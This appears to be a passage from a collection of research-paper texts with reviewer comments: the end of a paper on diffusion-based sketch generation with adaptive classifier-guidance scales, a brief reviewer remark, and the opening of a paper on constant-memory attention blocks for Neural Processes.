$c(x_{0|t})$ and $f(x_{0|t})$ are all scalar, denoting the complexity and the recognizability of an expected produced sketch $x_{0|t}$, respectively. Specifically, the stroke complexity $c(x_{0|t})$ is heuristically defined as the fraction of stroke pixels to the whole canvas: $c(x_{0|t}) = \frac{1}{HW} \sum_{HW} ||x_{0|t}||_0$. The recognizability $f(x_{0|t})$ is given by the probability of the estimated produced sketch $x_{0|t}$ being classified to the conditional class $y$, i.e., $f(x_{0|t}) = p_\phi(y|x_{0|t})$, where the classifier $p_\phi$ is parameterized by $\phi$, and trained using noisy sketches. Intuitively, the scale indicator $\varsigma(x_t)$ is to signal the demand for classifier guidance. For example, a high level of either complexity or recognizability will derive a small $\varsigma(x_t)$, suggesting a stop sign for applying the classifier guidance. In contrast, a large $\varsigma(x_t)$ implies the classifier guidance in need. $\alpha$ and $\beta$ are used to balance the effects between \( c(x_{0|t}) \) and \( f(x_{0|t}) \). In the following, we will show how to optimize the scale \( s \) according to the scaling indicator by introducing residual sketch. **Residual Sketch.** To measure the impact of classifier guidance on \( x_{0|t} \), i.e., the estimated final-step sketch \( x_0 \) based on the current sample \( x_t \), we can compare two versions of \( x_{0|t} \) before and after performing the classifier guidance, i.e., \( x_{0|t} \) and \( \hat{x}_{0|t} \). Namely, a residual sketch \( x_{rs} \) is developed to represent the per-pixel differences between \( x_{0|t} \) and \( \hat{x}_{0|t} \). Formally, \( x_{rs} \) is defined as follows: \[ x_{rs}(x_t, s) = |M(\hat{x}_{0|t}) - M(x_{0|t})| \] where \( M(\cdot) \in \mathbb{R}^{H \times W} \) is a Sigmoid function to transform a sketch (pixel values are firstly averaged across the RGB channels) into a soft binary mask, i.e., most of the pixel values are projected near zeros or ones. And \( |\cdot| \) is to ensure the entries in \( x_{rs} \in \mathbb{R}^{H \times W} \) are all positive. **Scale Optimization.** Here, we show how to optimize the gradient scale \( s \) according to the scaling indicator at each sampling step. Basically, this is achieved by enforcing the residual sketch \( x_{rs} \) to be synchronized with the scale indicator \( \zeta(x_t) \). Intuitively, \( x_{rs} \) should be an empty mask if \( \zeta(x_t) \) suggests a stop sign for applying the classifier guidance. Otherwise, \( x_{rs} \) should be richly painted if \( \zeta(x_t) \) is large, indicating guidance in high demand. Therefore, an optimization objective can be formulated as follows: \[ L_t(s) = \frac{1}{2} \sum_{i=1}^{N} \left( \zeta(x_t^{(i)}) - \frac{1}{HW} \sum_{HW} x_{rs}(x_t^{(i)}, s) \right)^2 \] where \( N \) is the number of sketches generated within a sampling batch, and \( L_t(s) \) is the mean squared error between the scaling indicator \( \zeta(x_t) \) and the global average pooling of the residual sketch \( x_{rs}(x_t, s) \). Stochastic gradient descent (SGD) is employed to obtain the optimal value of \( s \) at each timestep \( t \) by minimizing \( L_t(s) \). ### 4.2 Warm-up Sampling for Diversity Expansion Prior works [Dhariwal & Nichol (2021); Ho & Salimans (2021)] reveal that increasing the strength of the classification guidance can improve the sample precision (i.e., fidelity), while at the cost of recall, i.e., the degraded diversity of the generation. We show that beginning with a few unconditional sampling steps as warm-up can considerably alleviate the issue, i.e., boost the diversity of the generated samples. An empirical principle is applied to determine how many unconditional sampling steps are conducted for the warm-up. The idea is to carry out unconditional generation until the overall structure has been shaped. To achieve the goal, we can simply measure if the classification probability of the top-1 class, i.e., \( p(c_{1st}|x_{0|t}) \), exceeds any other classes by a pre-defined margin \( \eta \). Therefore, the end step \( t_w \) of the warm-up sampling can be set by: \[ t_w = t, \quad \text{if } p_\phi(c_{1st}|x_{0|t}) - p_\phi(c_{2nd}|x_{0|t}) > \eta \] ### 4.3 End-up Unconditional Denoising We observe that as the sampling goes on, the classifier gradient will gradually vanish and almost has no effect afterward. Therefore, we early-stop the classifier-guided sampling when the expected \( x_{0|t} \) at timestep \( t_d \) is sufficiently recognizable, i.e., \[ t_d = t, \quad \text{if } p_\phi(y|x_{0|t}) > \xi \] where \( \xi \) is a threshold to determine the endpoint of the guidance. However, it turns out that the produced sketches are still noisy (i.e., lots of clutter pixels scattered across the image) once the classifier-guided sampling is ceased at the cut-off point \( t_d \). We find out that continuing to progress unconditional denoising till the end (i.e., the pre-defined total number of DDIM sampling steps) will eventually produce sketches with clean backgrounds. ## 5 Experiments ### 5.1 Experimental Setup **Dataset.** The current largest doodle dataset QuickDraw, which has 345 common object categories, is adopted for model training and evaluation. In our experiments, a small subset, i.e., 30 categories are first randomly chosen to facilitate a thorough yet easier comparison with other baseline methods. Meanwhile, our model is trained on the complete 345 classes and compared with a few top-notch generative models to validate the scalability of our approach. **Competitors.** There are two categories of baseline methods based on the representation of the sketches, i.e., vector-based or raster-based. Vectorized sketch generation competitors include SketchRNN (Ha & Eck [2018]), SketchHealer (Su et al. [2020]), SketchAA (Yang et al. [2021a]), SketchKnitter (Wang et al. [2022]), and ChiroDiff (Das et al. [2022]). Due to the lack of existing raster-based sketch generation approaches, three strong image generation models, i.e., StyleGAN2 (Karras et al. [2020]), DDIM (Song et al. [2020a]), and classifier-free diffusion guidance (CFDG) (Ho & Salimans [2021]), are employed as alternatives for comparison. **Evaluation metrics.** Several standard metrics, including FID, precision, and recall, are leveraged for evaluation. Fréchet Inception Distance (FID) is widely used to measure the fidelity of the RGB images produced by generative models. To tailor it as a reasonable measurement for sketches, the same network Inception-V3 is employed but further finetuned on QuickDraw dataset for classification. Then the obtained customized Inception-V3 is utilized as a feature extractor, which is used to calculate the distance between the generated samples and the real data. Precision and recall are typically adopted by diffusion models to validate the quality and mode coverage of the generated samples. We follow (Nichol & Dhariwal [2021]) to employ the improved precision and recall metrics (Kynkänniemi et al. [2019]) to assess the generation results. **Language Aligned Expressivity.** We additionally proposed to utilize CLIP-Score (Radford et al. [2021]) to measure the expressiveness of the generated sketches. Intuitively, the produced sketches would express similar visual concepts to real sketches. In practice, CLIP-Score is leveraged to measure the distance between the generated sketches and the text descriptions of real ones, where the text descriptions are sourced by manually summarizing the visual content in the QuickDraw dataset. More specifically, five captions are constructed for each category under the template “this is a sketch of X”, where X is either a coarse or fine-grained linguistic caption, e.g., X = “a girl’s face with two pigtails”. A full list of the captions is attached in Appendix E. Then a pre-trained CLIP model ViT-L/14 (Dosovitskiy et al. [2021]) is used to extract the features of the generated sketches and the pre-defined descriptions using the image encoder and text encoder, respectively. The CLIP-Score is then defined as the averaged similarity between the generated sketches and their closest captions. Given CLIP-Score, we further propose a CLIP-Fine score which measures whether the retrieved top-1 captions are fine-grained or not. **Implementation details.** The same U-Net proposed in ADM (Dhariwal & Nichol [2021]) is employed as the noise predictor, and 10k sketches per category (batch size is 64) in the training set are used to train our model for 200k iterations. The default size of the produced sketches is set to $64 \times 64$. Four Nvidia 3090 GPUs are used and the learning rate is set to $1e^{-4}$. An EMA rate of 0.9999 is adopted to stabilize the training. The default parameters are $\alpha = 1.0$, $\beta = 0.2$, and $\gamma = 0.02$ in equation 2, which are determined on a validation set through greedy search. (See Appendix B for more details.) And we set $\eta = 0.2$ in equation 5, $\xi = 0.5$ in equation 6 empirically. During generation, the DDIM sampler is adopted and the default total steps are set to 250. And we can produce a batch ($N=128$) of sketches by simply calculating the average values of $\zeta(x_t)$ and $x_{rs}(x_t, s)$ within the batch, hence updating the loss $L_t(s)$ into a batch version accordingly. Using a shared scale within a batch can dramatically reduce the computation cost and speed up the sampling. Additionally, we use an asymmetric reverse process (Kwon et al. [2023]) to improve the controllability of classifier guidance, i.e., compute $x_{t-1}$ using the predicted noise before and after performing the guidance together. ### 5.2 Results **Quantitative Results.** As shown in Table 1, our model outperforms other competitors on all metrics except precision (ours achieves the second best). Interestingly, pixel-based generation methods (i.e., StyleGAN2, DDIM and ours) can clearly beat vector-based approaches. Additionally, our --- 1 fish, umbrella, apple, moon, shoe, cloud, candle, vase, chair, sun, cat, airplane, spider, car, pig, bus, face, yoga, butterfly, mosquito, lion, television, basket, barn, angel, pizza, book, grapes, fireplace, cake 2 The guidance scale for DDIM is set to 0.4 determined by greedy search, offering its best FID score. 3 The optimal guidance strength $\omega$ of CFDG is set to 2 for sketch generation. Table 1: Quantitative comparison results on QuickDraw Dataset. The best and second best are color-coded in red and blue, respectively. | Model | Random 30 Categories | 345 Categories | |---------------|----------------------|----------------| | | FID↓ CLIP-Score↑ CLIP-Fine(%)↑ Prec↑ Rec↑ | FID↓ CLIP-Score↑ CLIP-Fine(%)↑ Prec↑ Rec↑ | | SketchRNN | 8.15 0.59 52.67 0.37 0.22 | 10.32 0.26 0.24 | | SketchHealer | 5.85 0.63 51.51 0.67 0.12 | – – – | | SketchAA | 5.98 0.59 50.41 0.51 0.17 | – – – | | SketchKnitter | 7.05 0.55 43.15 0.41 0.19 | – – – | | ChiroDiff | 4.75 0.59 53.16 0.64 0.18 | 3.17 0.58 0.25 | | StyleGAN2 | 4.12 0.67 53.39 0.55 0.24 | 2.93 0.63 0.27 | | DDIM | 4.08 0.67 54.19 0.71 0.30 | 2.85 0.74 0.31 | | CFDG | 3.75 0.68 54.86 0.68 0.32 | 2.64 0.73 0.36 | | Ours | 3.08 0.68 55.54 0.68 0.35 | 2.51 0.72 0.39 | Our model achieves the highest CLIP-Score, indicating that the produced sketches by our model can best align the visual content of real sketches. Notably, a higher CLIP-Fine score (i.e., 55.5%) implies that our model tends to produce richer visual content. Some examples of the generated sketches and the retrieved captions are shown in Figure 1-4, which showcase how our generated sketches can align with the captions summarized from the real sketches. Figure 3: (a) Qualitative comparison results. (b) More generation results by our model. Qualitative Results. Some qualitative results are shown in Figure 3. From Figure 3(a), we can observe that: (i) sketches generated by our model are of better quality in terms of expressiveness, see the drawn whiskers of cat. (ii) Our method is also capable of depicting objects with more details, see the drawn antennae of a butterfly and the window of a car by our model, while these subtle parts are absent from the sketches obtained by other baseline methods. (iii) the sketches produced by our method are more visually appealing and recognizable, e.g., the eyes and nose on the human face are more vividly portrayed, and the overall visual appearance of lion is better and more identifiable. More samples generated by our approach can be found in Figure 3(b) and Appendix E. We also visualize an example of the sketch generation process in Figure 4 to better understand the effects of different sampling phases. We can observe that the overall shape of the expected sketch is formed during the warm-up sampling. The scale adaptive guidance sampling instantiates the generation according to the classifier guidance, yielding a sketch of a desired class that fits the overall shape formed in the previous stage. The last phase (i.e., end-up denoising) is responsible for further refinement. 5.3 Ablation Study Computation analysis and sampling acceleration. The number of denoising steps during generation is squeezed to 250 using the linear selection procedure following DDIM. To testify how the selection procedure and total sampling steps trade off the overall generation quality and the computational cost, we compare the results under different settings. Results in Table 2-4 reveal that the linear procedure is typically better than its quadratic counterpart. More sampling steps lead to improved FID and precision but with slightly reduced recall. However, the computational cost is obviously Figure 4: Visualization of $x_{0|t}$ and $x_t$. (a) The estimated final obtained sketches $x_{0|t}$ at time step $t$ during warm-up sampling (green box). The overall structure has been formed in this phase. (b) Given different class labels, i.e., cat and car, $x_{0|t}$ is gradually transformed into the corresponding sketch object by scale adaptive sampling (red box). The end-up denoising (blue) can further refine the sketches by removing the blur in the background. (c) Sketches generated at different time steps. Table 2: Ablative studies on applying different (a) skip procedures and (b) sampling phases. (a) Computation analysis. Acceleration in gray. | Procedure | Steps | FID↓ | Prec↑ | Rec↑ | Speed (s)↓ | |-----------|-------|------|-------|------|------------| | Quadratic | 100 | 18.85| 0.58 | 0.48 | 0.86 | | Linear | 100 | 4.95 | 0.62 | 0.48 | 0.90 | | Quadratic | 250 | 5.54 | 0.61 | 0.32 | 1.87 | | Linear | 250 | 3.08 | 0.68 | 0.35 | 1.90 | | Shortcut | 67 | 3.30 | 0.67 | 0.36 | 0.98 | (b) Effect of each sampling phase. | Model Variant | FID↓ | CLIP-Score↑ | Prec↑ | Rec↑ | Speed (s)↓ | |------------------------|------|-------------|-------|------|------------| | No warm-up | 3.22 | 0.63 | 0.69 | 0.32 | 2.87 | | No Adaptive | 3.54 | 0.62 | 0.67 | 0.42 | 3.07 | | Full Guidance | 4.08 | 0.67 | 0.71 | 0.30 | 3.27 | | No End-up Denoising | 3.24 | 0.62 | 0.68 | 0.25 | 5.74 | | Our Full Model | 3.08 | 0.68 | 0.68 | 0.35 | 1.90 | increased in this case. To accelerate the sampling, we will later show that the end-up denoising can occupy up to about 86% of the total sampling steps that can be dramatically shortened. Effect of each sampling phase. There are three phases in order during sampling, i.e., the warm-up sampling, the scale adaptive sampling, and the ending-up denoising sampling. To verify the effectiveness of each phase, we evaluate the generation results in different scenarios. Specifically, (i) No Warm-up: Without performing the warm-up sampling, we directly perform scale adaptive sampling at the beginning, followed by the end-up unconditional denoising till the end; (ii) No Adaptive: We keep all sampling phases unchanged (i.e., the start and end of each sampling stage remain unchanged) but switch the scale adaptive sampling to the vanilla classifier-guided sampling, i.e., applying a constant gradient scale; (iii) Full Guidance: All generation steps are classifier-guided samplings with a constant gradient scale. (iv) No End-up Denoising: Sketch generation starts with the warm-up sampling, followed by scale adaptive classifier-guided sampling till the end (i.e., 250 steps are reached). The results are shown in Table 2b. Compared with our full model, we can find out that (i) No Warm-up: Both the FID and recall are getting worse when without the warm-up sampling, indicating that carrying out unconditional generation at the beginning can benefit both fidelity and diversity; (ii) No Adaptive: Applying a constant scale (i.e., $s = 0.4$) to the classifier gradients will clearly harm the quality of generation, i.e., fidelity (FID). (iii) Full Guidance: Merely performing classifier guidance with a constant gradient scale (i.e., $s = 0.4$) will simultaneously lower the fidelity and diversity; (iv) No End-up Denoising: Both the fidelity and mode coverage of the produced sketches are compromised when maintaining the classifier guidance till the end. This is because too strong classifier guidance can lead to over-sketching, hence resulting in declined sample quality and diversity. Moreover, the generation is much more expensive (i.e., 5.74 s per sketch) in this case due to the increased sampling steps required for gradient scale optimization. Length of each sampling phase. To study the influence of varying the length of each sampling phase, we compare the generation results using different configurations of the parameters $\eta$ and $\xi$ in Eq. (5) and Eq. (6). Results are shown in Table 3. We can find out that most steps are occupied by the end-up denoising sampling, which can be shortened for acceleration as shown in the last row in Table 3. When increasing $\xi$ and fixing $\eta$, the length of the scale adaptive sampling becomes longer, Table 3: Comparison results when varying the parameters $\eta$ and $\xi$. | # Steps | $\eta$ | $\xi$ | Warm-up (%) | Adaptive(%) | End-up(%) | FID↓ | Prec↑ | Rec↑ | Speed (s) | |---------|--------|-------|-------------|-------------|-----------|------|-------|-------|----------| | T=250 | 0.3 | 6.01 | 8.26 | 85.73 | 3.21 | 0.65 | 0.38 | 1.76 | | | 0.4 | 6.01 | 10.02 | 83.97 | 3.17 | 0.66 | 0.37 | 1.83 | | | 0.5 | 6.01 | 11.73 | 82.25 | 3.08 | 0.68 | 0.35 | 1.90 | | | 0.1 | 4.47 | 12.56 | 82.97 | 3.12 | 0.69 | 0.32 | 2.03 | | | 0.3 | 13.27 | 7.52 | 79.21 | 5.37 | 0.61 | 0.42 | 1.78 | | | 0.4 | 18.52 | 5.44 | 76.04 | 8.53 | 0.57 | 0.48 | 1.67 | | T=67 (shortcut) | 0.2 | 0.5 | 15.22 | 40.90 | 43.88 | 3.30 | 0.67 | 0.36 | 0.98 | Figure 5: Visualization of the residual sketches $x_{rs}$ and the estimated final sketch $\hat{x}_{0|t}$ during scale optimization at (a) early (b) middle and (c) late sampling steps. By scale optimization, the residual sketches are getting more organized and cleaner. leading to improved sample quality (i.e., lower FID score) yet narrowing the mode coverage (i.e., reduced recall). Extending the warm-up sampling will squeeze the scale adaptive sampling, and let the sample quality get worse but achieve better diversity. The optimal balance is reached when warm-up takes about half the number of the adaptive sampling steps. Visualization of scale optimization. To better understand the mechanism of utilizing scaling indicator as an explicit signal to obtain the optimized gradient scale, we visualize the optimization process along with the corresponding residual sketches $x_{rs}(x_t, s)$ and the estimated final sketch $\hat{x}_{0|t}$. As shown in Figure 5, at the beginning of optimization, the randomly initiated guidance scale $s$ is often mismatched with the scaling indicator $\zeta(x_t)$. The corresponding residual sketch $x_{rs}(x_t, s)$ looks messy and unstructured, implying a less favorable (i.e., too noisy) output sketch $\hat{x}_{0|t}$ under the classifier guidance. Once the gap between $\zeta(x_t)$ and $x_{rs}(x_t, s)$ is closed, the residual sketch becomes cleaner and more organized. As a result, the expected sketches $\hat{x}_{0|t}$ using the optimized scale are painted in a more structured and concise way. 6 CONCLUSION Raster sketches generated by diffusion models using classifier guidance with a constant scale are sub-optimal, either too sparse to recognize or too densely depicted (i.e., over-sketching). We show that the generation quality can be improved by simply adjusting the guidance scale dynamically at each sampling step, without retraining the model. Concretely, we proposed to optimize the scale according to the predictable generation results at each sampling step by using the developed scale indicator and residual sketch. It is observed that the pixel changes, i.e., the residual sketches, during sampling are more organized and located at critical positions to form a sketch object by our model. Injecting unconditional sampling at the beginning and the end of generation is also beneficial. Uniquely, we proposed to assess the generated sketches in terms of expressiveness by using the CLIP-Score. It shows that ours can generate sketches containing richer object details. ACKNOWLEDGMENTS This work was supported by NSFC under No.61601042 and the Program for Youth Innovative Research Team of BUPT under No. 2023QNTD02. REFERENCES Caroline Chan, Frédo Durand, and Phillip Isola. Learning to generate line drawings that convey geometry and semantics. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 7915–7925, 2022. Yajing Chen, Shikui Tu, Yuqi Yi, and Lei Xu. Sketch-pix2seq: a model to generate sketches of multiple categories. arXiv preprint arXiv:1709.04121, 2017. Jooyoung Choi, Sungwon Kim, Yonghyun Jeong, Youngjune Gwon, and Sungroh Yoon. Ilvr: Conditioning method for denoising diffusion probabilistic models. In 2021 IEEE/CVF International Conference on Computer Vision (ICCV), pp. 14347–14356. IEEE Computer Society, 2021. Ayan Das, Yongxin Yang, Timothy Hospedales, Tao Xiang, and Yi-Zhe Song. Béziersketch: A generative model for scalable vector sketches. In ECCV, 2020. Ayan Das, Yongxin Yang, Timothy Hospedales, Tao Xiang, and Yi-Zhe Song. Chirodiff: Modelling chirographic data with diffusion models. In The Eleventh International Conference on Learning Representations, 2022. Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis. Advances in neural information processing systems, 34:8780–8794, 2021. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale. arXiv preprint arXiv:2010.11929, 2021. Oran Gafni, Adam Polyak, Oron Ashual, Shelly Sheynin, Devi Parikh, and Yaniv Taigman. Make-a-scene: Scene-based text-to-image generation with human priors. In European Conference on Computer Vision, pp. 89–106. Springer, 2022. Songwei Ge, Vedanuj Goswami, Larry Zitnick, and Devi Parikh. Creative sketch generation. In International Conference on Learning Representations, 2020. David Ha and Douglas Eck. A neural representation of sketch drawings. In International Conference on Learning Representations, 2018. Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. In NeurIPS 2021 Workshop on Deep Generative Models and Downstream Applications, 2021. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. arXiv preprint arXiv:2006.11239, 2020. Tero Karras, Samuli Laine, Miika Aittala, Janne Hellsten, Jaakko Lehtinen, and Timo Aila. Analyzing and improving the image quality of stylegan. arXiv preprint arXiv:1912.04958, 2020. Mingi Kwon, Jaeseok Jeong, and Youngjung Uh. Diffusion models already have a semantic latent space. arXiv preprint arXiv:2210.10960, 2023. Tuomas Kynkäänniemi, Tero Karras, Samuli Laine, Jaakko Lehtinen, and Timo Aila. Improved precision and recall metric for assessing generative models. Advances in Neural Information Processing Systems, 32, 2019. Mengtian Li, Zhe Lin, Radomir Mech, Ersin Yumer, and Deva Ramanan. Photo-sketching: Inferring contour drawings from images. In 2019 IEEE Winter Conference on Applications of Computer Vision (WACV), pp. 1403–1412. IEEE, 2019a. Yijun Li, Chen Fang, Aaron Hertzmann, Eli Shechtman, and Ming-Hsuan Yang. Im2pencil: Controllable pencil illustration from photographs. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 1525–1534, 2019b. Fang Liu, Xiaoming Deng, Yu-Kun Lai, Yong-Jin Liu, Cuixia Ma, and Hongan Wang. Sketchgan: Joint sketch completion and recognition with generative adversarial network. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5830–5839, 2019.
I0gwsdSgsk
The equation at the end of section 3 describing CMAB-AND is rather dense/difficult to read, even given an understanding of each of the components. An explanation of the update mechanism aside from the equation might help clarify.
Memory Efficient Neural Processes via Constant Memory Attention Block Anonymous authors Paper under double-blind review Abstract Neural Processes (NPs) are popular meta-learning methods for efficiently modelling predictive uncertainty. Recent state-of-the-art methods, however, leverage expensive attention mechanisms, limiting their applications, particularly in low-resource settings. In this work, we propose Constant Memory Attention Block (CMAB), a novel general-purpose attention block that (1) is permutation invariant, (2) computes its output in constant memory, and (3) performs updates in constant computation. Building on CMAB, we propose Constant Memory Attentive Neural Processes (CMANPs), an NP variant which only requires constant memory. Empirically, we show CMANPs achieve state-of-the-art results on popular NP benchmarks (meta-regression and image completion) while being significantly more memory efficient than prior methods. 1 Introduction Memory efficiency is important for a variety of reasons, for example: (1) Modern hardware, such as GPUs and TPUs, are often memory-constrained for applications and computing attention mechanisms is memory-intensive. This issue is accentuated now due to the ubiquity of low-memory/compute domains (e.g., IoT devices). (2) Memory efficiency is important in embedded platforms where memory access energy intensive. This is particularly important in mobile robots where a limited energy supply needs to be allocated (Li et al., 2022a). Neural Processes (NPs) have been popular meta-learning methods for efficiently modelling predictive uncertainty. They have been applied to a wide variety of settings such as graph link prediction (Liang & Gao, 2022), continual learning (Requeima et al., 2019), and geographical precipitation modeling (Foong et al., 2020) – many of which can have high-dimensional inputs. NPs are particularly useful in low-resource settings due to not requiring retraining from scratch given new data. State-of-the-art methods, however, rely on attention mechanisms which require a substantial amount of memory and do not scale well with the number of tokens (Jha et al., 2022), limiting their applications in low compute domains (e.g., IoT devices, mobile phones and other battery-powered devices). For example, Transformer Neural Processes (TNPs) (Nguyen & Grover, 2022) scale quadratically with the size of the context and query dataset. Latent Bottlenecked Attentive Neural Processes (LBANPs) (Feng et al., 2023) is $O(NL)$ where $N$ is the size of the context dataset and $L$ is a hyperparameter that scales with the difficulty of the task and the size of the context dataset. As such, in this work, we propose (1) Constant Memory Attention Block (CMAB), a novel general-purpose attention block that (i) is permutation invariant, (ii) computes its output in constant memory, and (iii) performs updates in constant computation. To the best of our knowledge, we are the first to propose an attention mechanism with the aforementioned properties. Due to having memory usage independent of the number of inputs, CMABs naturally scale to large amounts of inputs. Building on CMABs, we propose (2) Constant Memory Attentive Neural Processes (CMANPs). By leveraging the efficiency properties of CMABs, CMANPs are (i) scalable in the number of datapoints and (ii) allow for efficient updates. Leveraging the efficient updates property, we further introduce an Autoregressive Not-Diagonal extension, namely, CMANP-AND which only requires constant memory unlike the quadratic memory required by all prior Not-Diagonal extensions. In the experiments, CMANPs achieve state-of-the-art results on meta-regression and image completion tasks. We empirically show that CMANPs only require constant memory, making it significantly more efficient than prior state-of-the-art methods. 2 BACKGROUND 2.1 Meta-learning for Predictive Uncertainty Estimation In meta-learning for predictive uncertainty estimation, models are trained on a distribution of tasks $\Omega(\mathcal{T})$ to model a probabilistic predictive distribution. A task $\mathcal{T}$ is a tuple $(\mathcal{X}, \mathcal{Y}, \mathcal{L}, q)$ where $\mathcal{X}, \mathcal{Y}$ are the input and output space respectively, $\mathcal{L}$ is the task-specific loss function, and $q(x,y)$ is the task-specific distribution over data points. During each meta-training iteration, $B$ tasks $\mathcal{T} = \{\mathcal{T}_i\}_{i=1}^{B}$ are sampled from the task distribution $\Omega(\mathcal{T})$. For each task $\mathcal{T}_i \in \mathcal{T}$, a context dataset $\mathcal{D}_C^i = \{(x,y)^{i,j}\}_{j=1}^{N}$ and a target dataset $\mathcal{D}_T^i = \{(x,y)^{i,j}\}_{j=1}^{M}$ are sampled from the task-specific data point distribution $q_{\mathcal{T}_i}$. $N$ is a fixed number of context datapoints and $M$ is a fixed number of target datapoints. The model is adapted using the context dataset. Afterwards, the target dataset is used to evaluate the effectiveness of the adaptation and adjust the adaptation rule accordingly. 2.2 Neural Processes Neural Processes (NPs) are meta-learned models that define a family of conditional distributions. Specifically, NPs condition on an arbitrary amount of context datapoints (labelled datapoints) and make predictions for a batch of target datapoints, while preserving invariance in the ordering of the context dataset. NPs consist of three phases: conditioning, querying, and updating. **Conditioning:** In the conditioning phase, the model encodes the context dataset $\mathcal{D}_C$. Neural Processes [Garnelo et al., 2018b] model functional uncertainty by encoding the context dataset as a Gaussian latent variable: $z_C \sim q(z|\mathcal{D}_C)$ where $q(z|\mathcal{D}_C) = \mathcal{N}(z; \mu_C, \sigma_C^2)$ and $\mu_C, \sigma_C = f_{\text{encoder}}(\mathcal{D}_C)$. Conditional variants [Garnelo et al., 2018a] instead compute a deterministic encoding, i.e., $z_C = f_{\text{encoder}}(\mathcal{D}_C)$. **Querying:** In the querying phase, given target datapoints $x_T$ to make predictions for, the NP models the predictive distribution $p(y_T|x_T, z_C)$. **Updating:** In the updating phase, the model receives new datapoints $\mathcal{D}_U$, and new encodings are computed, i.e., re-computing $z_C$ given $\mathcal{D}_C \leftarrow \mathcal{D}_C \cup \mathcal{D}_U$. The deterministic variant maximizes the log-likelihood directly. In contrast, the stochastic variant maximizes an evidence lower bound (ELBO) of the log-likelihood instead: $$\log p(y_T|x_T, \mathcal{D}_C) \geq \mathbb{E}_{q(z|\mathcal{D}_C \cup \mathcal{D}_T)}[\log p(y_T|x_T, z)] - \text{KL}(q(z|\mathcal{D}_C \cup \mathcal{D}_T)||p(z|\mathcal{D}_C))$$ 3 METHODOLOGY In this section, we introduce the Constant Memory Attention Block (CMAB), a novel attention mechanism which preserves permutation invariance while only requiring (1) constant memory to compute its output and (2) constant computation to perform updates. Leveraging the efficiency properties of CMAB, we propose Constant Memory Attentive Neural Processes (CMANPs). We also introduce CMANP-AND (Autoregressive Not-Diagonal) extensions which only require constant memory in contrast to the quadratic memory required by prior Not-Diagonal extensions, allowing for scalability to a larger number of datapoints. 3.1 Constant Memory Attention Block (CMAB) Constant Memory Attention Block (Figure 1) takes as input the input data $\mathcal{D}$ and a set of input latent vectors $L_I$ and outputs a set of output latent vectors $L_f$. The objective of the block is to encode the information of the input data $\mathcal{D}$ into a fixed-sized representation $|L_I|$. Each CMAB comprises two cross-attention modules, two self-attention modules, and one set of block-wise latent vectors $L_B$ whose value is learned during training. When stacking CMABs, the output latent vectors of the previous CMAB are fed as the input latent vectors to the next, i.e., $L_I \leftarrow L_I'$. Similar in style to that of iterative attention [Jaegle et al., 2021], the value of $L_I$ of the first stacked CMAB block is learned. A fundamental difference, however, is that iterative attention can neither compute the output in constant memory nor perform the updates in constant computation. CMAB initially compresses the input data by applying a cross-attention between the input data and the block-wise latent vectors $L_B$. Next, self-attention is used to compute higher-order information: $$L'_B = \text{SelfAttention}(\text{CrossAttention}(L_B, D))$$ Afterwards, another cross-attention between the input vectors $L_I$ and $L'_B$ is performed and an additional self-attention is used to further compute higher-order information, resulting in the output vectors $L'_I$: $$L'_I = \text{SelfAttention}(\text{CrossAttention}(L_I, L'_B))$$ In summary, CMAB (Figure 1) works as follows: $$\text{CMAB}(L_I, D) = L'_I = \text{SA}(\text{CA}(L_I, \text{SA}(\text{CA}(L_B, D))))$$ where SA represents SelfAttention and CA represents CrossAttention. The two cross-attentions have a linear computational complexity of $\mathcal{O}(|D||L_B|)$ and a constant computational complexity $\mathcal{O}(|L_B||L_I|)$. The self-attentions have constant complexities of $\mathcal{O}(|L_B|^2)$ and $\mathcal{O}(|L_I|^2)$. As such, the total computation required to produce the output of the block is $\mathcal{O}(|D||L_B| + |L_B|^2 + |L_B||L_I| + |L_I|^2)$ where the number of latents $|L_B|$ and $|L_I|$ are hyperparameter constants which bottleneck the amount of information which can be encoded. ### 3.1.1 Constant Computation Updates A significant advantage of CMABs is that when given new inputs, CMABs can compute the updated output in constant computation per new datapoint. In contrast, a transformer block would require re-computing its output from scratch, requiring quadratic computation to perform a similar update. Having previously computed $\text{CMAB}(L_I, D)$ and given new datapoints $D_U$ (e.g., from sequential settings such as contextual bandits), $\text{CMAB}(L_I, D \cup D_U)$ can be computed in $\mathcal{O}(|D_U|)$, i.e., a constant amount of computation per new datapoint. **Proof Outline:** Since $|L_B|$ and $|L_I|$ are constants (hyperparameters), CMAB’s complexity is constant except for the contributing complexity part of the first attention block: $\text{CrossAttention}(L_B, D)$, which has a complexity of $\mathcal{O}(|D||L_B|)$. As such, to achieve constant computation updates, it suffices that the updated output of this cross-attention can be updated in constant computation per datapoint. Simplified, $\text{CrossAttention}(L_B, D)$ is computed as follows: $$\text{CrossAttention}(L_B, D) = \text{softmax}(QK^T)V$$ where $K$ and $V$ are key-value matrices respectively that represent the embeddings of the input data $D$, and $Q$ is the query matrix representing the embeddings of the block-wise latents $L_B$. When an update with $|D_U|$ new datapoints occurs, $|D_U|$ rows are added to the key, value matrices. Crucially, the query matrix is constant due to the block-wise latent vectors $L_B$ being a fixed set of latent vectors. --- 1 CMABs also allow for efficient removal of datapoints (and consequently edits as well) to the input data, but this is outside the scope of this work. whose values are learned. As a result, the output of the cross-attention can be computed via a rolling average in \(O(|D_U|)\). A formal proof and description of this process is included in the Appendix. As a result, we have the following update function: \[ \text{CrossAttention}(L_B, D \cup D_U) = \text{UPDATE}(D_U, \text{CrossAttention}(L_B, D)) \] where the UPDATE operation has a complexity of \(O(|D_U|)\). Each of the remaining self-attention and cross-attention blocks only requires constant computation. As such, CMAB can compute its updated output in \(O(|D_U|)\), i.e., a constant amount of computation per new datapoint. ### 3.1.2 Computing Output in Constant Memory Leveraging the efficient updates property, CMABs can compute their output in constant memory regardless of the number of inputs. Naive computation of the output of CMAB requires non-constant memory due to \(\text{CrossAttention}(L_B, D)\) having a linear memory complexity of \(O(|D||L_B|)\). To achieve constant memory computation, we split the input data \(D\) into \(\lceil |D|/b_C 